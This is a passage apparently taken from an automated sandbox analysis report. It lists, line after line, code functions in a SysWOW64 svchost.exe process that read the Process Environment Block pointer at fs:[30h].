            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
